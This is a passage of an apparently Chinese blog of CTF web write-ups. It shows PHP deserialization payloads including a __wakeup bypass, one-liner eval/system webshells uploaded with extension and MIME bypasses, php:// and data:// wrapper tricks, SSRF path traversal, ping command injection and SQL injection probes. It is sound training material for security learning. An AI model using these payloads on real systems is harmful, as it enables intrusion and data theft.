<td align="center">“ * a”;</td>
<td align="center">第一个属性名(见注)</td>
</tr>
<tr>
<td align="center">s:</td>
<td align="center">第一个属性值的类型</td>
</tr>
<tr>
<td align="center">9:</td>
<td align="center">第一个属性值有9个字符</td>
</tr>
<tr>
<td align="center">“xiaoshizi”;</td>
<td align="center">第一个属性值</td>
</tr>
<tr>
<td align="center">s:</td>
<td align="center">第二个属性名类型</td>
</tr>
<tr>
<td align="center">7:</td>
<td align="center">第二个属性有7个字符</td>
</tr>
<tr>
<td align="center">“ test b”;</td>
<td align="center">第二个属性名(见注)</td>
</tr>
<tr>
<td align="center">s:</td>
<td align="center">第二个属性值为字符型</td>
</tr>
<tr>
<td align="center">8:</td>
<td align="center">有8个字符</td>
</tr>
<tr>
<td align="center">“laoshizi”;</td>
<td align="center">第二个属性值</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;<span style="background-color: red;">注：</span>如果变量前是protected，则会在变量名前加上<code>\x00*\x00</code>,private则会在变量名前加上<code>\x00类名\x00</code></p>
<p>&emsp;&emsp;学完了，再来看题，很明显，以GET方式传入一个序列化字串做参数p即可，手拿把掐</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># 序列化元素为对象，类名为wllm，有两个属性</span><br><span class="line">O:4:&quot;wllm&quot;:2:&#123;&#125;</span><br><span class="line"># 第一个属性值为admin才可通过</span><br><span class="line">s:5:&quot;admin&quot;;s:5:&quot;admin&quot;;</span><br><span class="line"># 第一个属性值为ctf才可通过</span><br><span class="line">s:6:&quot;passwd&quot;;s:3:&quot;ctf&quot;;</span><br><span class="line"># 连起来</span><br><span class="line">O:4:&quot;wllm&quot;:2:&#123;s:5:&quot;admin&quot;;s:5:&quot;admin&quot;;s:6:&quot;passwd&quot;;s:3:&quot;ctf&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;传入参数后得到flag</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/426_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="426_结果展示">

<h2><span id="423_swpuctf-2021-新生赛easyupload20-文件上传-文件后缀绕过">423_[SWPUCTF 2021 新生赛]easyupload2.0 –文件上传 –文件后缀绕过</span></h2><p>&emsp;&emsp;进入环境，拔剑四顾心茫然ヽ(゜Q。)ノ？，看题目名字，得，先学吧</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"># 原理：用户上传可执行脚本文件对整个网站甚至服务器进行控制，这个脚本又叫Webshell</span><br><span class="line"># 一句话木马示例</span><br><span class="line">&lt;?php @eval(~);?&gt;       # @用于抑制eval函数的报错，~中填写PHP代码</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;本地编个.php文件试试看：<code>&lt;?php @eval (system(&quot;ls /&quot;)); ?&gt;</code>，结果返还提示：php是不行滴，看来是被限制了</p>
<p>&emsp;&emsp;查阅得知，.php文件还可以修改为<span style="background-color: yellow;">.phtml(含PHP代码的.html文件)</span>后缀且不影响功能，用BurpSuite抓包改一下，出现提示</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/423_%E6%8A%93%E5%8C%85%E4%BF%AE%E6%94%B9%E7%BB%93%E6%9E%9C.png" class title="423_抓包修改结果">

<p>&emsp;&emsp;进入提示.phtml文件，得到命令执行函数的运行结果</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/423_%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%BB%93%E6%9E%9C.png" class title="423_命令执行结果">

<p>&emsp;&emsp;没有思路，决定先理清目录结构</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 执行命令：pwd</span><br><span class="line">&lt;?php @eval(system(&quot;pwd&quot;);?&gt;          # 返回：/app/upload</span><br><span class="line"># 执行命令：ls /app</span><br><span class="line">&lt;?php @eval(system(&quot;ls /app&quot;);?&gt;      # 返回：flag.php index.php upload upload.php</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;露出马脚，直接cat看一看，发现flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 执行命令：cat /app/flag.php</span><br><span class="line">&lt;?php @eval(system(&quot;cat /app/flag.php&quot;);?&gt;</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/423_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="423_结果展示">

<h2><span id="3865_litctf-2023php是世界上最好的语言">3865_[LitCTF 2023]PHP是世界上最好的语言！！</span></h2><p>&emsp;&emsp;进入环境，根据题目提示，先一句话试试水：<code>&lt;?php @eval(system(&quot;cat /flag&quot;);?&gt;</code>，直接给出结果</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3865_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="3865_结果展示">

<h2><span id="388_swpuctf-2021-新生赛easyupload10-文件上传-phpinfo直出-mime绕过">388_[SWPUCTF 2021 新生赛]easyupload1.0 –文件上传 –phpinfo()直出 –MIME绕过</span></h2><p>&emsp;&emsp;进入环境，根据题目判断为文件上传问题，先尝试构建一个一句话木马试试水</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval(system(&quot;pwd&quot;);?&gt;             #返回：想啥呢</span><br><span class="line"># 修改文件后缀为.phtml，无变化</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;这里只能看出来是代码存在一定防护机制，但看不出来针对于哪个地方；没办法，上网搜一下一般监测点</p>
<table>
<thead>
<tr>
<th align="center">监测点</th>
<th align="center">绕过</th>
</tr>
</thead>
<tbody><tr>
<td align="center">Content-Type</td>
<td align="center">文件类型绕过</td>
</tr>
<tr>
<td align="center">filename</td>
<td align="center">文件头、文件后缀名绕过</td>
</tr>
<tr>
<td align="center">文件内容</td>
<td align="center">指定字符、指定格式绕过</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;一个个尝试下，首先是Content-Type，由于题中页面给出信息“upload1.jpg”，所以将Content-Type改为图片对应值，出现新的变动</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/388_CT%E4%BF%AE%E6%94%B9%E7%BB%93%E6%9E%9C.png" class title="388_CT修改结果">

<p>&emsp;&emsp;接下来老套路了，先理清目录结构 &#x3D;&gt; 找到马脚 &#x3D;&gt; 手拿把掐</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 运行：pwd</span><br><span class="line">&lt;?php @eval(system(&quot;pwd&quot;);?&gt;                     # 返回：/app/upload</span><br><span class="line"># 运行：ls /app</span><br><span class="line">&lt;?php @eval (system(&quot;ls /app&quot;));?&gt;               # 返回：flag.php index.php upload upload.php</span><br><span class="line"># 运行：cat ../flag.php</span><br><span class="line">&lt;?php @eval (system(&quot;cat ../flag.php&quot;));?&gt;       </span><br><span class="line"># 返回：</span><br><span class="line">&lt;?php </span><br><span class="line">$flag = &#x27;WLLMCTF&#123;I_d0nt_w4nna_wak3up&#125;&#x27;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;惊吓吗，flag是错的，继续找吧；这里在找资料时发现一句新的代码：<code>&lt;?php phpinfo();?&gt;</code>，据说好用，走走看</p>
<p>&emsp;&emsp;真好用&gt; . &lt;，下为结算画面</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/388_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="388_结果展示">

<h2><span id="3863_litctf-2023导弹迷踪-不知道怎么评价">3863_[LitCTF 2023]导弹迷踪 –不知道怎么评价</span></h2><p>&emsp;&emsp;进入环境，好消息，有游戏玩；坏消息，在戏耍你</p>
<p>&emsp;&emsp;我天生不爱游戏，选择一点点搜着看JS源代码，f、l、a、g都看了遍T _ TT _ T，没结果，还有几个.js文件，接着看</p>
<p>&emsp;&emsp;在&#x2F;src&#x2F;game.js可以找到，给出如下</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3863_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="3863_结果展示">

<h2><span id="429_swpuctf-2021-新生赛no_wakeup-反序列化-魔术方法绕过-__wakeup绕过">429_[SWPUCTF 2021 新生赛]no_wakeup –反序列化 –魔术方法绕过 –<code>__wakeup()</code>绕过</span></h2><p>&emsp;&emsp;进入环境，点击获得PHP代码，和426一模一样，只有类名和passwd更改了，直接套用：<code>O:6:&quot;HaHaHa&quot;:2:&#123;s:5:&quot;admin&quot;;s:5:&quot;admin&quot;;s:6:&quot;passwd&quot;;s:4:&quot;wllm&quot;;&#125;</code>，得到结果</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/429_%E5%8A%A0%E5%AF%86%E7%BB%93%E6%9E%9C.png" class title="429_加密结果">

<p>&emsp;&emsp;好吧其实不太一样，注意其中<code>$this-&gt;passwd = sha1($this-&gt;passwd);</code>，passwd经过了一次加密，这里先介绍反序列化的魔术方法</p>
<table>
<thead>
<tr>
<th align="center">魔术方法</th>
<th align="center">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><code>serialize()</code></td>
<td align="center">将对象转换成字符串</td>
</tr>
<tr>
<td align="center"><code>unserialize()</code></td>
<td align="center">将字符串还原成一个对象，触发条件：unserialize函数的变量可控，文件中存在可利用的类，类中有魔术方法</td>
</tr>
<tr>
<td align="center"><code>__toString()</code></td>
<td align="center">在将一个对象转化成字符串时自动调用，比如使用echo打印对象时</td>
</tr>
<tr>
<td align="center"><code>__construct()</code></td>
<td align="center">创建对象时触发</td>
</tr>
<tr>
<td align="center"><code>__destruct()</code></td>
<td align="center">对象被销毁时触发</td>
</tr>
<tr>
<td align="center"><code>__wakeup()</code></td>
<td align="center">unserialize()时，会检查是否存在一个__wakeup()魔术方法。存在，则该方法会先被调用</td>
</tr>
<tr>
<td align="center"><code>__call()</code></td>
<td align="center">在对象上下文中调用不可访问的方法时触发</td>
</tr>
<tr>
<td align="center"><code>__invoke()</code></td>
<td align="center">在脚本尝试将对象调用为函数时触发</td>
</tr>
<tr>
<td align="center"><code>__callStatic</code></td>
<td align="center">在静态上下文中调用不可访问的方法时触发</td>
</tr>
<tr>
<td align="center"><code>__get</code></td>
<td align="center">用于从不可访问的属性读取数据</td>
</tr>
<tr>
<td align="center"><code>__set</code></td>
<td align="center">用于将数据写入不可访问的属性</td>
</tr>
<tr>
<td align="center"><code>__isset()</code></td>
<td align="center">在不可访问的属性上调用isset()或empty()时触发</td>
</tr>
<tr>
<td align="center"><code>__unset()</code></td>
<td align="center">在不可访问的属性上使用unset()时触发</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;此题学习其中第六个方法的绕过，网上查阅得知：针对<code>__wakeup()</code>方法有一个CVE漏洞，CVE-2016-7124</p>
<p>&emsp;&emsp;<span style="background-color: yellow;"><strong>CVE-2016-7124</strong></span>：当反序列化一个包含特定属性的对象时，如果对象的属性数量在序列化字符串中被错误地指定（即大于或小于对象实际具有的属性数量），那么PHP可能会跳过<code>__wakeup()</code>魔术方法的执行</p>
<p>&emsp;&emsp;于是修改一下：<code>O:6:&quot;HaHaHa&quot;:3:&#123;s:5:&quot;admin&quot;;s:5:&quot;admin&quot;;s:6:&quot;passwd&quot;;s:4:&quot;wllm&quot;;&#125;</code>，出现flag</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/429_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="429_结果展示">

<h2><span id="441_swpuctf-2021-新生赛pseudoprotocols-php伪协议-file_get_contents-文件包含漏洞-datax2fx2ftextx2fplain伪协议">441_[SWPUCTF 2021 新生赛]PseudoProtocols –PHP伪协议 –file_get_contents() –文件包含漏洞 –data:&#x2F;&#x2F;text&#x2F;plain伪协议</span></h2><p>&emsp;&emsp;进入环境，根据提示，有hint.php需要找到，但直接输入该文件却不显示</p>
<p>&emsp;&emsp;注意到上方URL地址处自动带了一个变量&#x3D;，联想到构造PHP伪协议读取文件，同427</p>
<p>&emsp;&emsp;于是，构造<code>wllm=php://filter/read=convert.base64-encode/resource=hint.php</code>，得到Base64编码后的提示</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/441_Base64%E5%8A%A0%E5%AF%86%E7%BB%93%E6%9E%9C.png" class title="441_Base64加密结果">

<p>&emsp;&emsp;进入提示.php文件，得到PHP代码，审计发现函数file_get_contents()不认识，学吧</p>
<p>&emsp;&emsp;<strong>string file_get_contents ( string filename [, bool use_include_path &#x3D; false [, resource context &#x3D; NULL [, int offset &#x3D; 0 [, int $maxlen &#x3D; NULL ]]]] )</strong></p>
<table>
<thead>
<tr>
<th align="center">参数名称</th>
<th align="center">是否必需</th>
<th align="center">描述</th>
<th align="center">默认值</th>
</tr>
</thead>
<tbody><tr>
<td align="center">$filename</td>
<td align="center">是</td>
<td align="center">要读取的文件或 URL</td>
<td align="center">无</td>
</tr>
<tr>
<td align="center">$use_include_path</td>
<td align="center">否</td>
<td align="center">如为 <code>true</code>，则 PHP 会在 <code>include_path</code> 中查找文件。</td>
<td align="center">false</td>
</tr>
<tr>
<td align="center">$context</td>
<td align="center">否</td>
<td align="center">指定上下文资源，可以修改文件流的行为</td>
<td align="center">NULL</td>
</tr>
<tr>
<td align="center">$offset</td>
<td align="center">否</td>
<td align="center">从文件的哪个位置开始读取。</td>
<td align="center">0（即从文件开头开始）</td>
</tr>
<tr>
<td align="center">$maxlen</td>
<td align="center">否</td>
<td align="center">最多读取多少字节。</td>
<td align="center">NULL（即读取整个文件）</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;奇怪的是，我并没有找到这里关于参数’r’的定义；不过这不影响做题，我们只需要让变量$a是一个文件，且文件内容为”I want flag”即可，于是构造PHP伪协议，不过我不会，又学</p>
<p>&emsp;&emsp;查阅得知，适用该魔术方法的伪协议为<code>data://text/plain</code>，学一下</p>
<p>&emsp;&emsp;<span style="background-color: yellow;"><strong>data:&#x2F;&#x2F;text&#x2F;plain</strong></span>：允许内联数据作为文件资源来使用，text&#x2F;plain为资源类型，后跟“,资源”</p>
<p>&emsp;&emsp;尝试构建PHP伪协议：<code>?a=data://text/plain,I want flag</code>，成功得到flag</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/441_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="441_结果展示">

<h2><span id="958_nctf-2018签到题">958_[NCTF 2018]签到题</span></h2><p>&emsp;&emsp;进入环境，发现是百度的界面，也不是给的贴图，是真的百度界面</p>
<p>&emsp;&emsp;分析JS源码，找flag关键字，没找到；curl抓包，被调戏；利用自己写的脚本遍历一下目录，露出马脚</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/958_%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E7%BB%93%E6%9E%9C.png" class title="958_目录扫描结果">

<p>&emsp;&emsp;接着用curl抓包&#x2F;index.php，发现flag</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/958_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="958_结果展示">

<h2><span id="2011_nisactf-2022easyssrf-php伪协议-ssrf漏洞-stristr">2011_[NISACTF 2022]easyssrf –PHP伪协议 –SSRF漏洞 –stristr()</span></h2><p>&emsp;&emsp;进入环境，被搞的一脸懵，回头看题名，选择先学SSRF是个啥，以下是询问文心一言的结果</p>
<table>
<thead>
<tr>
<th align="center"><strong>类别</strong></th>
<th><strong>内容</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>定义与原理</strong></td>
<td>SSRF（Server-Side Request Forgery）允许攻击者构造请求，并由服务端发起请求，以访问或攻击内网无法从外网直接访问的系统或服务。其原理在于服务端提供了从其他服务器应用获取数据的功能，但并未对目标地址进行充分的过滤和限制。</td>
</tr>
<tr>
<td align="center"><strong>漏洞成因</strong></td>
<td>1. 服务端提供了从其他服务器应用获取数据的功能。<br>2. 服务端没有对目标地址进行过滤与限制。</td>
</tr>
<tr>
<td align="center"><strong>漏洞利用方式</strong></td>
<td>1. 端口扫描<br>2. 攻击内网应用<br>3. 指纹识别<br>4. 读取本地文件<br>5. DoS攻击</td>
</tr>
<tr>
<td align="center"><strong>常用URL伪协议</strong></td>
<td>1. file:&#x2F;&#x2F;<br>2. dict:&#x2F;&#x2F;<br>3. sftp:&#x2F;&#x2F;<br>4. ldap:&#x2F;&#x2F;<br>5. tftp:&#x2F;&#x2F;<br>6. gopher:&#x2F;&#x2F;</td>
</tr>
<tr>
<td align="center"><strong>防御措施</strong></td>
<td>1. 禁用不需要的协议，如file:&#x2F;&#x2F;, gopher:&#x2F;&#x2F;, ftp:&#x2F;&#x2F;等。<br>2. 设置URL白名单或限制内网IP访问。<br>3. 限制请求的端口为HTTP常用端口，如80、443等。<br>4. 过滤返回信息，避免泄露敏感信息。<br>5. 统一错误信息，防止攻击者根据错误信息判断远端服务器的端口状态。</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;好，很符合我现在的困境，一个个试试看，首先是file:&#x2F;&#x2F;，随便给个试试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">file:///bin                 # 返回：害羞羞，试试其他路径？</span><br><span class="line">file:///secret              # 同上</span><br><span class="line">file:///flag                # 返回：都说了这里看不了flag。。但是可以看看提示文件：/fl4g</span><br><span class="line">file:///fl4g                # 返回：你应该看看除了index.php，是不是还有个ha1x1ux1u.php</span><br><span class="line">file:///fl4g/ha1x1ux1u.php  # 返回：害羞羞，试试其他路径？</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;到这里，出现线索没有用上的地方，直接在URL上访问这个文件</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/2011_ha1x1ux1u%E4%BB%A3%E7%A0%81.png" class title="2011_ha1x1ux1u代码">

<p>&emsp;&emsp;行，这个函数又不认识，学</p>
<p>&emsp;&emsp;**string stristr ( string haystack , mixed needle [, bool $before_needle &#x3D; FALSE ] )**，用于在字符串中查找子字符串的首次出现，如果找到子字符串，则返回从该位置到字符串末尾的所有字符；如果没有找到，则返回 FALSE</p>
<table>
<thead>
<tr>
<th><strong>参数</strong></th>
<th><strong>描述</strong></th>
<th><strong>类型</strong></th>
<th><strong>默认值</strong></th>
</tr>
</thead>
<tbody><tr>
<td>haystack</td>
<td>要搜索的字符串</td>
<td>string</td>
<td>必填</td>
</tr>
<tr>
<td>needle</td>
<td>要查找的子字符串，如果不是字符串则会被转换为整型并应用为字符的顺序码</td>
<td>mixed</td>
<td>必填</td>
</tr>
<tr>
<td>before_needle</td>
<td>如果设置为<code>TRUE</code>，则返回<code>needle</code>在<code>haystack</code>中出现之前的部分</td>
<td>bool</td>
<td>FALSE</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;也就是说我的参数file中不能出现字串“file”，再加上结尾的file_get_contents()函数，直接让file参数找flag文件位置即可，找到即得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?file=flag                                # 无结果</span><br><span class="line">?file=../flag                             # 无结果</span><br><span class="line">?file=../../flag                          # 无结果</span><br><span class="line">?file=../../../flag                       # 无结果</span><br><span class="line">?file=../../../../flag                    # 来了</span><br></pre></td></tr></table></figure>

<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/2011_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="2011_结果展示">

<p>&emsp;&emsp;回头看了看佬们的WriteUp，发现了一种新的办法：<code>?file=php://filter/read=convert.base64-encode/resource=/flag</code></p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/2011_%E8%A7%A3%E6%B3%952.png" class title="2011_解法2">

<p>&emsp;&emsp;将Base64编码解码后，同样能得到flag</p>
<h2><span id="3864_litctf-2023follow-me-and-hack-me">3864_[LitCTF 2023]Follow me and hack me</span></h2><p>&emsp;&emsp;进入环境，根据提示，用HackBar分别传入指定参数，得到flag</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3864_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="3864_结果展示">

<h2><span id="3873_litctf-2023ping-ping命令注入">3873_[LitCTF 2023]Ping –ping命令注入</span></h2><p>&emsp;&emsp;进入环境，随便输入一个域名<code>www.baidu.com</code>，得到警告要求只能输入ip，查看网页源代码得到JS函数</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">check_ip</span>(<span class="params"></span>)&#123;</span><br><span class="line">    <span class="keyword">let</span> ip = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;command&#x27;</span>).<span class="property">value</span>;</span><br><span class="line">    <span class="keyword">let</span> re = <span class="regexp">/^(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[1-9]?\d)$/</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(re.<span class="title function_">test</span>(ip.<span class="title function_">trim</span>()))&#123;      <span class="comment">// ip.trim()将ip两端的空白符消除，re.test()测试ip是否满足a.b.c.d，0~255</span></span><br><span class="line">      <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="title function_">alert</span>(<span class="string">&#x27;敢于尝试已经是很厉害了，如果是这样的话，就只能输入ip哦&#x27;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;没有思路就去看博客，发现ping指令存在命令注入漏洞：在无waf的情况下，可以直接在ping的ip后面利用<code>;</code>添加shell命令，试试看</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3873_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E5%B0%9D%E8%AF%95.png" class title="3873_命令注入尝试">

<p>&emsp;&emsp;接下来就好办了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1;ls /                      # 返回：bin dev etc flag home lib ……</span><br><span class="line">127.0.0.1;cat /flag                 # 返回flag</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;结算画面</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/3873_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="3873_结果展示">

<h2><span id="713_bjdctf-2020easy_md5-弱比较-数组绕过-md5-mysql特性">713_[BJDCTF 2020]easy_md5 –弱比较 –数组绕过 –md5() –MySQL特性</span></h2><p>&emsp;&emsp;进入环境，先输俩数进去，没反应，curl抓包试一试，出现提示</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/713_curl%E7%BB%93%E6%9E%9C.png" class title="713_curl结果">

<p>&emsp;&emsp;根据hint提示，猜想是SQL注入，后面的md5()函数带了个参数true，分析其意思</p>
<p>&emsp;&emsp;<strong>string md5 ( string str [, bool $raw_output &#x3D; FALSE ] )</strong></p>
<table>
<thead>
<tr>
<th align="center">参数</th>
<th align="center">含义</th>
</tr>
</thead>
<tbody><tr>
<td align="center">$str</td>
<td align="center">需要计算哈希值的字符串</td>
</tr>
<tr>
<td align="center">$raw_output</td>
<td align="center">如果为true，则输出原始的二进制数据；如果为false，则输出十六进制数</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;即需使<code>password=md5($pass, true)</code>为真，查阅得知MySQL有以下特性</p>
<p>&emsp;&emsp;<span style="background-color: yellow;"><strong>在MySQL里，用作布尔型判断时，以数字开头的字符串会被当做整型数</strong></span></p>
<p>&emsp;&emsp;故只需要构造<code>password=&#39;&#39;or&#39;1xxxxxxx&#39;</code>型字符即可，网上搜了一个：<strong>ffifdyop</strong>，输入，查看网页源代码，得到下一步提示</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/713_%E6%BA%90%E7%A0%81%E5%B1%95%E7%A4%BA.png" class title="713_源码展示">

<p>&emsp;&emsp;这就好办了，直接数组绕过传参，具体原理见386，得到下一步PHP代码</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/713_PHP%E4%BB%A3%E7%A0%81.png" class title="713_PHP代码">

<p>&emsp;&emsp;一样的操作，得到flag</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/713_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="713_结果展示">

<h2><span id="2074_nssctf-2022-spring-recruitezgame">2074_[NSSCTF 2022 Spring Recruit]ezgame</span></h2><p>&emsp;&emsp;进入环境，直接找源码，不想被折磨，一共两个.js文件</p>
<p>&emsp;&emsp;还是玩了把，结束字段有“Your”，于是ctrl+F查找flag、Your，找到flag</p>
<img src="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0/2074_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" class title="2074_结果展示">

<h2><span id="19_suctf-2019easysql-sql注入-sql注入类型-堆叠注入">19_[suctf 2019]EasySQL –SQL注入 –SQL注入类型 –堆叠注入</span></h2><p>&emsp;&emsp;进入环境，根据题目，显然是SQL注入知识点，可以先来系统性学一下SQL注入的类型</p>
<table>
<thead>
<tr>
<th align="center">类型</th>
<th align="center">解释</th>
</tr>
</thead>
<tbody><tr>
<td align="center">联合注入</td>
<td align="center">即使用”union select”语句，又分字符型与数字型注入</td>
</tr>
<tr>
<td align="center">布尔盲注</td>
<td align="center">Web的页面的仅仅会返回True和False，布尔盲注就是根据页面返回的True或者是False来得到数据库中的相关信息</td>
</tr>
<tr>
<td align="center">时间盲注</td>
<td align="center">利用sleep()或benchmark()等函数使程序睡眠，通过页面的响应时间长短来判断返回值是true还是false，从而猜解字段</td>
</tr>
<tr>
<td align="center">宽字注入</td>
<td align="center">\</td>
</tr>
<tr>
<td align="center">报错注入</td>
<td align="center">通过特殊函数错误使用并使其输出错误结果来获取信息</td>
</tr>
<tr>
<td align="center">堆叠注入</td>
<td align="center">MySQL的多语句查询格式，语句间使用分号隔开</td>
</tr>
<tr>
<td align="center">二次注入</td>
<td align="center">攻击者构造的恶意数据存储在数据库后，恶意数据被读取并进入到SQL查询语句所导致的注入</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;根据解释，一一尝试，由于URL上并未显示参数，初步判定参数以POST方式上传</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1                                      # Array ( [0] =&gt; 1 )</span><br><span class="line">2-1                                    # Array ( [0] =&gt; 1 )</span><br><span class="line">1-1                                    # Array ( [0] =&gt; 0 )</span><br><span class="line">1&#x27; and 1=1                             # Nonono.</span><br><span class="line">1&#x27; and &#x27;1=1&#x27;                           # Nonono.</span><br><span class="line">1&#x27; union select 1 --+                  # 